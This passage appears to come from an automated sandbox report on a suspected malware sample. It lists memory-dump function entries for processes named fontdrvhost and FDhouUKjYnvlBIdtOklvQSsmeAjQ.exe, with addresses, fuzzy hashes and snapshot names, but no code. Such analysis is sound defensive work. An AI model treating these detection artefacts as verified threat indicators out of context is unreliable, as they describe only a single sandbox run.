Instruction ID: 8bafd2288f8cdce767e0348fdcfdbac0be8eee05fa86f289382132851b16de0a
Opcode Fuzzy Hash: a2311c50a3f89907cd5dbcb33b462afd9622ffdb3d09168b0b9e3cbf4a4372bc
Instruction Fuzzy Hash: 81F0A03170C4188FE72CEA14D8512B933A2EB80314F226279C05BC35D2DF39A6038740

Function 00007FFD9BDCCD09 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43cb86d6915d58e0ee49a7c26fd5934a3ebf95553d90f25407ed116a46207b79
Instruction ID: e0fdbcdb939b28cd70a13a228ba132c465f427296efc6fd6f58f00185ef0b0ba
Opcode Fuzzy Hash: 43cb86d6915d58e0ee49a7c26fd5934a3ebf95553d90f25407ed116a46207b79
Instruction Fuzzy Hash: 33F08C3080EB894FE37AA76448750707FF0DF2720071A04FBC18AC75B2E86969C98342

Function 00007FFD9B8A06F2 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
Instruction ID: 6c988dfbd83351cde7a75cc606598e7b6a0d165b3bf3804d998fac8910971834
Opcode Fuzzy Hash: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
Instruction Fuzzy Hash: 0AE0D841D5F74E06E61722BD54B609C7A141F9AA18F9A00B3C44D860B2B88D22990672

Function 00007FFD9B8A6F2A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
Instruction ID: 799bd24c2599b592bb6a3b5bf590a6f44821d7247ebad1ef3226a78a5e22d81a
Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
Instruction Fuzzy Hash: E3E01220F1A41E4AFB75A794C8707F96191AF9CB00F1A00B4D90DD32E2DD386F41CB51

Function 00007FFD9BC92827 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8739bf592d4791f7773102a35e2daa14b00fd453909f545a29fb6cf8cc694156
Instruction ID: 3a1e7500b8f97c2a56d04fde585c38204680e201440a4abafa8259671508526b
Opcode Fuzzy Hash: 8739bf592d4791f7773102a35e2daa14b00fd453909f545a29fb6cf8cc694156
Instruction Fuzzy Hash: E5D01243F1F68A4AFB7901F0047206C0A805F1734074701BAD1968D2E7DD8CA9055325

Function 00007FFD9BC97BE7 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb82e2e70799356652c804c1d4e1e5f5261c82f7c7b5826759bf1a683002834e
Instruction ID: 63354e1e5373f3cce49cecdc481aff3db1c3db759d079f382382217e8e5fc3e4
Opcode Fuzzy Hash: eb82e2e70799356652c804c1d4e1e5f5261c82f7c7b5826759bf1a683002834e
Instruction Fuzzy Hash: 09D05E83F2F38A5BFB3205B4087607C1A809F17340B4B0CB7D19ACE2E7DA8C2A454326

Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
Instruction ID: 61a82a8a173822ad6cbb196ee21d2251885d850747f84f11fca81989d8f34839
Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
Instruction Fuzzy Hash: 1CC04C05F6B61F01F83577EE98A60ACA1405BDDF14FD71172D54D400F1AC4D22D90177

Function 00007FFD9B8A12E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
Instruction ID: e9f9372fbf982ea4d297a857402a0a94ca5ea82dec3110fee052764f1dcc8fcd
Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
Instruction Fuzzy Hash: AFC08C3051180D8FC948EB28C88480473A0FB0D300BC20090E408C7170D22ADCC1C780

Function 00007FFD9B8A0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
Instruction ID: 4bf2e6fc272987765bad03551401c6f5706531bff79944a27e42e78464cd5699
Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
Instruction Fuzzy Hash: 8EC08C306118088FC900F72CC88480032A0FB0D210BC20190E00EC7174E21AAC80C700

Function 00007FFD9BC9330B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287d6b6090b85acd719f5b5807bbbf47d8bb6ec2b557018d5fdcd510fa50d3d1
Instruction ID: 23f2c126f520d0dd4f740b13c2d3e645d0c9575c4461b6430aade6b2bc8692f3
Opcode Fuzzy Hash: 287d6b6090b85acd719f5b5807bbbf47d8bb6ec2b557018d5fdcd510fa50d3d1
Instruction Fuzzy Hash: 08D0C964B4F68F85F57846E1407023E51906F84700F62403DD09F478E9CF1C7B02A206

Function 00007FFD9BC9B0E5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: a9a0df7987011b3cacb54162c98b1c7c3a4ccd39e15979eb32f26e14ae1c8122
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 74C04C303048189FD794DA5DC0D463873D1EF49301B5100B4E04ACF2B5C5289D499710

Function 00007FFD9B8A50E2 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae8d5dcbb98faea331701bce19bcf64c78e81f0a553b061e27394d5df4298b6b
Instruction ID: c47124e9910c5c09306e1bb60f68aa3b95d1bcc2492587cc7fe41aaa99378cd2
Opcode Fuzzy Hash: ae8d5dcbb98faea331701bce19bcf64c78e81f0a553b061e27394d5df4298b6b
Instruction Fuzzy Hash: 29C00205F1881A06E66A6658587257E44829B45A08F990174E019D66CADD1C5E021286

Function 00007FFD9B8A4846 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction ID: ed279b283bc7975634674f66e9f1098c809eb1f62e37847df7a92925c9bef6e0
Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction Fuzzy Hash: F0C02220E2800C00EB30A3B0C8223BA32002F28200F0B8AB3800EE20C2EC282A008080

Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction ID: 8482343a60a9166bf1e9f9ae43ab096e65e0e387be4f108466c4a365c238ef59
Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction Fuzzy Hash: CBB01200E6740F00E42833FA08E206470405B4C600FC610B0D40D400A1984D22980263

Analysis Process: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exePID: 7776, Parent PID: 7224COMMON

Executed Functions

Function 00007FFD9B8B0515 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B04C6

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 29da4b82ffc331327ae2990cbea34ad9eefb760b440755561446b5ef22a08a24
Instruction ID: a5cf72a23167dbb78e61765d43a93f83e75194165e8af2dab7782b80377dedc5
Opcode Fuzzy Hash: 29da4b82ffc331327ae2990cbea34ad9eefb760b440755561446b5ef22a08a24
Instruction Fuzzy Hash: FAF0E07094F3D55FCB15A775485D8547F60EF5720174941FEC086CF163D91D8886C741

Function 00007FFD9B8B9F89 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B9FA6

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 230ba97b0b267c4b1448ca7cb140bfb97baa36aa3d2ee4e1f326e0de125a30d3
Instruction ID: 59b73eac71e4658cb361c0ad03428d5a4707f72b87d10aa4f365f8c4d0516b4e
Opcode Fuzzy Hash: 230ba97b0b267c4b1448ca7cb140bfb97baa36aa3d2ee4e1f326e0de125a30d3
Instruction Fuzzy Hash: A2F0E57050F7C44FC71A9A7488288147FA0EF2720074A42EFC045CF1A3EA2CC889CB01

Function 00007FFD9B8B2A09 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B2A26

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: d141e697d6f082d1976ef2c85797beeeaf8c75f1533f7d34af21a63e8fcb698e
Instruction ID: 9731f67db491e75c8e49096a1311ee9fad004608a2c76cb669192b87f15f4a78
Opcode Fuzzy Hash: d141e697d6f082d1976ef2c85797beeeaf8c75f1533f7d34af21a63e8fcb698e
Instruction Fuzzy Hash: 3FF0A02060F3C44FC716DA7888298057FA0AF6721134A52EEC045CF1A3EA1C9885C701

Function 00007FFD9B8B9EF9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B9F16

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 3837b88d7eebc642db5f9453ee1ac5a0a1a89f90fb5f6f431c5185038c33e48e
Instruction ID: 927e6cea1e00704e74e5d893fdea8012cf0829493879b4d31f9b11d4055e05f7
Opcode Fuzzy Hash: 3837b88d7eebc642db5f9453ee1ac5a0a1a89f90fb5f6f431c5185038c33e48e
Instruction Fuzzy Hash: E9E0396160E7C44FC71AAA748869854BFA0AF6721174A42EFC045CB1A3EA298889CB01

Function 00007FFD9B8B04A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8B04C6

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 44f88ba1d28b81a93ddcbe450e117c632d18a26d61e53cf0085b933eccb8a6a8
Instruction ID: 036efaeffd31da5ebfd7d8ba846ad5c548a5ddf1eee4b548b8123d3fc34fc245
Opcode Fuzzy Hash: 44f88ba1d28b81a93ddcbe450e117c632d18a26d61e53cf0085b933eccb8a6a8
Instruction Fuzzy Hash: 2CE09B7154F7C44FC716D73488694547FA0EF6720574A51EEC085CF1A3DA1DD849CB01

Function 00007FFD9B8B7BC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8B7BE6

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 04133ecd0354231a20ccade490174bc175ff4fb36702536d1dfbfc203bc83545
Instruction ID: 5425b3b6eac58616cc648ebc450680d093638a67af1d4fe8a11b3dc7bf50c9a3
Opcode Fuzzy Hash: 04133ecd0354231a20ccade490174bc175ff4fb36702536d1dfbfc203bc83545
Instruction Fuzzy Hash: 43E01A7154F3D44FCB16EB7988698453FA0AE6B21178B41EEC085CF1B3E62DD849CB11

Function 00007FFD9B8B1DF8 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27a9107fa3cf6736d32767033878b192f874f4872dc870fc547d5fc8905b4cf
Instruction ID: 451589ff544bf7181ee7620e208c5cb564aa91c9427550d55865eb5462fa954b
Opcode Fuzzy Hash: f27a9107fa3cf6736d32767033878b192f874f4872dc870fc547d5fc8905b4cf
Instruction Fuzzy Hash: 70416932B0D9694FEB24EFA8D865AF937A1EF95310F05027BD019CB2D2DD642D458BC1

Function 00007FFD9B8BCEA6 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d384dd2e8a23c596dfb718663fa85a6bdd744faf40d5d13c51089353e8c4f173
Instruction ID: 1985307e287b28de289635025ea08104fcee40546fc81d1a6eef601914db70f4
Opcode Fuzzy Hash: d384dd2e8a23c596dfb718663fa85a6bdd744faf40d5d13c51089353e8c4f173
Instruction Fuzzy Hash: C7019E32F0952E8BEB68C7ACD4687FD72E1EB58300F050131E009E7191DA38AA418F90

Function 00007FFD9B8BA439 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ff6d160a77e25bd10eb7d148c98d8e2eee52ab82c0b9c9643b8c8eb36a5059
Instruction ID: affe18d47c3f09fe9974e1d19bea1bf129bf6747f36ab197a613c511487d3688
Opcode Fuzzy Hash: e0ff6d160a77e25bd10eb7d148c98d8e2eee52ab82c0b9c9643b8c8eb36a5059
Instruction Fuzzy Hash: B4F0E521B5DBC80FC769A62D5869061BFE1DB5B60134A41FFC086C72E3ED59AC898742

Function 00007FFD9B8BABBA Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c2f96385698ab5e8f5327013be05e2c44adb16b28486174fbc21c00d80b0424
Instruction ID: 0f9bef454685aa90838f77b6396cc24bc55c27c662d97abaf307e1556f84ac35
Opcode Fuzzy Hash: 4c2f96385698ab5e8f5327013be05e2c44adb16b28486174fbc21c00d80b0424
Instruction Fuzzy Hash: 26F0B470B1A91E2BE6A4977844A6BB862C2FB5C300F000175E04CC31D2CE3869858AC0

Function 00007FFD9B8B1749 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8338d014beb8f4e5cd8efaedd0b26ebc0ee115f4eec4a5ab9655e67a0cc40b
Instruction ID: 505a599ff37a3decf6b0f875659a78920465640cb5d8828cd71bf113cb0ecb1d
Opcode Fuzzy Hash: 9f8338d014beb8f4e5cd8efaedd0b26ebc0ee115f4eec4a5ab9655e67a0cc40b
Instruction Fuzzy Hash: AFE092207197C80FC70E97388869660BFA1EF5B105B8A12EAC045CB1A3DA1CDC89C741

Function 00007FFD9B894A93 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b890000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc371ec160168cd39696a4658f553f3061aafaa4a711842f765bb6b4ea0a0e0b
Instruction ID: bd78d6c33fbbecc18b7f4370bf198570d2393ca414354fff8e2ad66911dc282a
Opcode Fuzzy Hash: dc371ec160168cd39696a4658f553f3061aafaa4a711842f765bb6b4ea0a0e0b
Instruction Fuzzy Hash: D7F03731B0D50E8BEE74EB88D4506B93392EB4D351F164579D45FC32D7DE38AA428644

Function 00007FFD9B8B6BE6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f4153af626e799d3fb227256a138322a62c1c7378d0e226b198165b32954d6
Instruction ID: 848d6320d59e94967fc6a7abdf3fa85633200d50ca7eae81ce45bbeab62af607
Opcode Fuzzy Hash: c4f4153af626e799d3fb227256a138322a62c1c7378d0e226b198165b32954d6
Instruction Fuzzy Hash: 00E09231B095294BE7289718C4A07B57281FB88310F126279C04ED32D3DA38AE4689C1

Function 00007FFD9B895610 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b890000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1692663a040946b8b65bb60d7a87bcb915823bf6660cee3c5ac693d211ae682
Instruction ID: c5edb8612743fb9256b56b27de080153de844b89c7f05df48c79b6ee50b486c9
Opcode Fuzzy Hash: a1692663a040946b8b65bb60d7a87bcb915823bf6660cee3c5ac693d211ae682
Instruction Fuzzy Hash: 2FD05E30B6194D4B8B0CA62D8458530B3D1E7AA20A7945278940BC2295ED25ECC68B80

Function 00007FFD9B8B9FA0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8B9F10 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8B7339 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc1e0479580d7a2b064493b0241acfa7a7c52c0eeec9ae16e4076467ddecde5
Instruction ID: 7007af73c6c50bab63d5fb3dedbac0468f200cc0b7250223b5092174cb03ca83
Opcode Fuzzy Hash: ccc1e0479580d7a2b064493b0241acfa7a7c52c0eeec9ae16e4076467ddecde5
Instruction Fuzzy Hash: 66E04F2694F7C04FC74B973488B88447FA0EE1B21078E41EAC085CF1B3DA1A9849C711

Function 00007FFD9B8B8969 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf508d060ec61c03a7b6918db90b4c2c42581f1efaa9ec20166066c984b23fe
Instruction ID: f19e3aa0b21f0d89540b148d5daaf47f821ab9914ce575aa01da36ed696a3e9b
Opcode Fuzzy Hash: 7bf508d060ec61c03a7b6918db90b4c2c42581f1efaa9ec20166066c984b23fe
Instruction Fuzzy Hash: DDE0EC6150A7844FC74A97248C699403FB0EE2721178B01C7D445CF5B3E6599D89C752

Function 00007FFD9B8B17F0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9B8B6900 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction ID: a10960b0b2a9a5d1f98e12ac64761c3e507708143c0410f29ed2e5cb9ebc3220
Opcode Fuzzy Hash: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction Fuzzy Hash: 97D01235B519044FC71CA73888598747391EB6E2167D540A9D40AC72B1D96AED89CB81

Function 00007FFD9B894486 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

